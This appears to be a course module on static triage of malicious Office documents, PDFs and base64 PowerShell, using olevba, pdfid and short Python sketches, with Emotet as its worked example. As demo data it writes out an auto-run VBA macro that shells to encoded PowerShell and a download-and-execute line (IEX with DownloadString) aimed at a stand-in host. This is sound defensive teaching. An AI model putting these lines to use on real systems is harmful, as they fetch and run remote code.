Module 11: Document & Script Malware
Type 6 · Reconstruct: extract embedded macros from a .doc with olevba, flag suspicious objects in a PDF with pdfid, and decode a base64 PowerShell payload. The deliverable is an IOC summary with ATT&CK tagging (T1566.001, T1059.001) for each artifact. (Secondary: Misconception Reveal, an olevba score is triage priority, not a verdict.)
Last reviewed: 2026-06
Malware Analysis — analyse the attack surface that reaches every inbox: weaponised Office files, PDFs, and obfuscated scripts.
In 60 seconds
Weaponised documents are a top initial-access vector not because the technique is clever but because
the delivery is legitimate — Outlook opens the .docx, Adobe opens the PDF, PowerShell runs the
script, and the malicious logic rides inside a trusted container. olevba (part of oletools) and
pdfid make triage tractable in minutes, but an olevba score is triage priority, not a verdict. The
whole maldoc chain (macro → Shell → base64 PowerShell) decodes without ever executing the file,
because base64 is encoding, not encryption.
Why this matters
Phishing with weaponised documents remains one of the top initial-access vectors year after year. The reason is not that the technique is sophisticated; it is that the delivery is legitimate. Outlook opens .docx files; Adobe opens PDFs; PowerShell runs scripts. The malicious logic rides inside a trusted container. An analyst who cannot triage a suspicious document is blocked at the most common entry point for enterprise intrusions. Tools like olevba (part of oletools) and pdfid make this triage tractable in minutes.
Emotet is the textbook maldoc chain. It spread for years through phishing emails carrying a Word document with a malicious VBA macro (T1566.001) that, on open, launched an obfuscated PowerShell downloader (T1059.001) to pull the payload. That is the precise macro → Shell/CreateObject → base64-PowerShell sequence this module triages. (The MITRE ATT&CK entry for Emotet, S0367, documents the spearphishing-attachment delivery and the PowerShell stage.)
Objective
Extract and analyse the embedded macros from a synthetic .doc file using olevba, identify suspicious objects in a synthetic PDF using pdfid, and decode a base64-obfuscated PowerShell script — producing an IOC summary and ATT&CK tagging for each.
The core idea
The mental model
The malicious logic rides inside a trusted container, so triage is about finding the attack
surface inside it. Office files are compound formats (OLE2 for .doc/.xls; Open XML zip
archives for .docx/.xlsx). Macros live in OLE streams as compressed VBA source and p-code:
directly in the OLE2 file, or in a vbaProject.bin container inside macro-enabled Open XML
files such as .docm/.xlsm. olevba extracts and decompresses the source and scores the
high-risk bits: auto-execute handlers (AutoOpen, Document_Open), shell invocations (Shell,
CreateObject("WScript.Shell")), string obfuscation, network access.
flowchart LR
D["phishing .doc"] --> A["VBA macro<br/>AutoOpen / Document_Open"]
A --> SH["Shell / CreateObject<br/>(WScript.Shell)"]
SH --> PS["base64 PowerShell<br/>downloader"]
PS --> PL["fetch + run payload"]
The gotcha
The olevba score is a triage priority, not a verdict. A score above the warning threshold means "look more carefully," not "this is malicious" — benign documents with legitimate macros score too, and treating the number as a label produces both false alarms and false clears. The verdict comes from reading what the macro actually does, not from the heuristic total.
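To make the gotcha concrete, here is a minimal sketch of keyword-based flagging in the spirit of olevba's indicators. It is not olevba's implementation: the keyword lists, the `flag_vba` name, and both sample macros are illustrative assumptions, and it operates on VBA source text that has already been extracted.

```python
import re

# Illustrative keyword lists (assumptions, far shorter than olevba's real ones).
AUTOEXEC = ("AutoOpen", "Document_Open", "Workbook_Open")
SUSPICIOUS = ("Shell", "CreateObject", "WScript.Shell", "powershell")


def flag_vba(source: str) -> dict[str, list[str]]:
    """Return keyword hits grouped by category; hits are leads, not a verdict."""
    hits = {"autoexec": [], "suspicious": []}
    for category, keywords in (("autoexec", AUTOEXEC), ("suspicious", SUSPICIOUS)):
        for kw in keywords:
            # Case-insensitive whole-keyword match (VBA is case-insensitive).
            if re.search(rf"(?<!\w){re.escape(kw)}(?!\w)", source, re.IGNORECASE):
                hits[category].append(kw)
    return hits


# Synthetic macro that launches an encoded PowerShell command on open.
MALICIOUS = '''Sub AutoOpen()
    Shell "powershell -enc AAAA", 0
End Sub'''

# Synthetic macro that only touches the file system object model.
BENIGN = '''Sub Document_Open()
    Set fso = CreateObject("Scripting.FileSystemObject")
End Sub'''

malicious_hits = flag_vba(MALICIOUS)
benign_hits = flag_vba(BENIGN)
```

Both samples produce hits in both categories, which is the point: the flags tell you where to read, and only reading the macro separates the downloader from the harmless helper.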
PDFs are more structurally permissive. The format supports JavaScript, embedded files (including executable PE binaries), and URI launch actions — all within the PDF specification. pdfid counts the occurrences of high-risk PDF object types: /JS and /JavaScript flag embedded JavaScript; /OpenAction and /AA flag automatic execution triggers; /EmbeddedFile flags an embedded object. The presence of /JS + /OpenAction together is the most reliable signal of a malicious PDF — benign PDFs rarely need both. pdfid alone does not extract or execute the JavaScript; for that, you would use pdf-parser or peepdf.
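The counting idea can be sketched with the standard library alone. This is a simplified approximation, not pdfid itself: the `count_pdf_keywords` name and the sample bytes are assumptions, only the keywords named above are counted, and nothing inside compressed streams is inspected. It does normalise hex-escaped names (for example `/J#53` for `/JS`), a common evasion trick.

```python
import re

# Keywords named in the text; the real pdfid reports a longer list.
KEYWORDS = ("/JS", "/JavaScript", "/OpenAction", "/AA", "/EmbeddedFile")


def _unescape_name(match: re.Match) -> bytes:
    # PDF names may hex-escape characters, e.g. /J#53 is /JS.
    return bytes([int(match.group(1), 16)])


def count_pdf_keywords(data: bytes) -> dict[str, int]:
    """Count high-risk name objects in raw PDF bytes (no stream decompression)."""
    normalised = re.sub(rb"#([0-9A-Fa-f]{2})", _unescape_name, data)
    counts = {}
    for kw in KEYWORDS:
        # Require a non-alphanumeric character next so /AA does not match /AAB.
        pattern = re.escape(kw.encode()) + rb"(?![A-Za-z0-9])"
        counts[kw] = len(re.findall(pattern, normalised))
    return counts


# Synthetic fragment: an auto-run action plus an obfuscated /JS name.
SAMPLE = (
    b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
    b"2 0 obj << /S /JavaScript /J#53 (app.alert(1)) >> endobj\n"
)

counts = count_pdf_keywords(SAMPLE)
needs_review = bool(counts["/JS"] or counts["/JavaScript"]) and bool(
    counts["/OpenAction"] or counts["/AA"]
)
```

Here `needs_review` encodes the JavaScript-plus-auto-trigger combination described above; as with macro flags, it raises priority and does not replace extracting and reading the script.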
Go deeper: PowerShell obfuscation and the triage workflow
Most phishing chains end in a PowerShell stage — Emotet's macro spawned an obfuscated command that
rebuilt its download URLs at runtime. The canonical idiom: a base64 blob, then
[System.Convert]::FromBase64String() + [System.Text.Encoding]::Unicode.GetString(). This is
encoding, not encryption — no key, so decoding is always possible once you find the blob.
FromBase64String is your entry point; the decoded string is your next IOC. Full workflow: hash →
olevba/pdfid to find the surface → extract the script → decode strings → identify the payload
URL/filename. None of it requires executing the document.
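The decode step can be reproduced offline in a few lines. The sketch below assumes the blob is UTF-16LE text, which is what PowerShell's `Unicode` encoding means; the function names, the URL pattern, and the synthetic command are illustrative, and `example.test` is a reserved name that resolves nowhere.

```python
import base64
import re


def decode_powershell_b64(blob: str) -> str:
    """Decode a base64 blob as UTF-16LE, the encoding PowerShell calls 'Unicode'."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le")


def extract_urls(script: str) -> list[str]:
    """Pull http(s) URLs out of decoded script text as candidate IOCs."""
    return re.findall(r"https?://[^\s'\"()]+", script)


# Synthetic payload built here for the demo, then encoded the way a maldoc would carry it.
command = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a.ps1')"
blob = base64.b64encode(command.encode("utf-16-le")).decode("ascii")

decoded = decode_powershell_b64(blob)
urls = extract_urls(decoded)
```

If the decoded text comes out with a NUL after every character, the blob was treated as single-byte text instead of UTF-16LE. Real samples often layer further string tricks on top, so treat the first decode as the start of the chain.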
Learn (~2.5 hrs)
oletools and Office macro analysis
- decalage2/oletools, olevba documentation: the canonical reference; read the "Indicators" and "Output format" sections (~25 min).
- SANS ISC, "Maldoc Analysis with olevba" (diary): a real-world walkthrough on a phishing document; shows the full triage flow (~20 min).
PDF analysis
- pdfid documentation (Didier Stevens): explains the keyword counts and what each flag means; read "pdfid" and the "Usage" section (~20 min).
- MITRE ATT&CK T1566.001 (Phishing: Spearphishing Attachment): covers maldocs as an initial-access technique with real procedure examples (~15 min).
PowerShell obfuscation
- MITRE ATT&CK T1059.001 (Command and Scripting Interpreter: PowerShell): includes procedure examples that use encoded or obfuscated commands, plus detection opportunities (~15 min).
- Emotet, MITRE ATT&CK S0367: the canonical maldoc family, spearphishing attachment (T1566.001) → VBA macro → obfuscated PowerShell downloader (T1059.001). Read its delivery techniques to anchor the triage chain in this module on a real campaign (~15 min).
Key concepts
- olevba extracts VBA source and applies heuristic scoring; the score is triage priority, not a verdict.
- Auto-execute handlers (AutoOpen, Document_Open) plus Shell/CreateObject is the highest-risk pattern.
- /JS + /OpenAction together in a PDF is the primary maldoc signal; pdfid counts both.
- PowerShell base64 payloads typically decode through FromBase64String or arrive via -EncodedCommand; those strings are your pivot.
- Full document-malware triage never requires executing the document.
- ATT&CK: T1566.001 (phishing delivery), T1059.001 (PowerShell execution), T1027.010 (command obfuscation).
- Real worked family: Emotet (maldoc downloader). Phishing Word doc → VBA macro → obfuscated base64 PowerShell downloader is the exact chain this module triages, attributed to a real high-volume campaign.
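One way to hold these concepts together in the deliverable is a small per-artifact record. The structure below is only a sketch: the `ArtifactSummary` fields, the `summarise` helper, the file name, and the placeholder bytes are all hypothetical choices, not a prescribed report format.

```python
import hashlib
import json
from dataclasses import asdict, dataclass, field


@dataclass
class ArtifactSummary:
    name: str
    sha256: str
    indicators: list[str] = field(default_factory=list)
    attack_ids: list[str] = field(default_factory=list)


def summarise(name: str, data: bytes, indicators: list[str], attack_ids: list[str]) -> ArtifactSummary:
    """Hash the artifact bytes and attach the analyst's findings."""
    digest = hashlib.sha256(data).hexdigest()
    return ArtifactSummary(name, digest, indicators, sorted(attack_ids))


# Placeholder bytes and findings stand in for a real sample.
summary = summarise(
    "invoice.doc",
    b"synthetic sample bytes",
    ["AutoOpen", "Shell", "http://example.test/a.ps1"],
    ["T1566.001", "T1059.001"],
)
report = json.dumps(asdict(summary), indent=2)
```

Hashing first pins every later finding to one exact file, and keeping ATT&CK IDs next to the indicators that justify them makes the tagging auditable.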
AI acceleration
Paste extracted VBA or decoded PowerShell into a model and prompt: "Analyse this script. List any IOCs (URLs, IPs, file paths), identify the likely payload delivery mechanism, and map the behaviour to ATT&CK technique IDs." Effective for rapid triage of long macro scripts. Verify any extracted URL by checking it against VirusTotal before using it in reporting — do not browse to it.
AI caveat
A model triages long macro/PowerShell scripts fast and pulls IOCs well, but the extracted URL is a lead, not a confirmed indicator — verify it via VirusTotal, and never browse to it from your analysis host.
Check yourself
- Why is a weaponised document such a durable initial-access vector despite being unsophisticated?
- An olevba score is high. What does that license you to conclude, and what does it not?
- Why can a base64 PowerShell payload always be decoded statically, while a true encrypted blob cannot?